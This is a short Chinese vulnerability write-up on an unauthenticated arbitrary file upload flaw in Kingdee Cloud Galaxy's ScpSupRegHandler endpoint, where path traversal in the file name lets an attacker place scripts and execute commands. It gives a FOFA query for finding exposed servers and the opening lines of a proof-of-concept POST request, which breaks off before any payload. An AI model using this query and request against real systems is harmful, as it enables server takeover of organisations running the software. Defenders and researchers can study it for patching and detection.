简介
金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。攻击者可在无需登录的情况下利用构造的文件名(如使用"../../../../"等路径穿越技巧)将恶意脚本文件上传至服务器上的非预期目录,最终可导致远程执行恶意命令,控制服务器。
漏洞复现
FOFA语法:
icon_hash="-1629133697" && title=="金蝶云星空"
访问界面返回信息如下所示:
POC1:
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: ip
Content-Length: 283
Content-Type: multipart/form-dat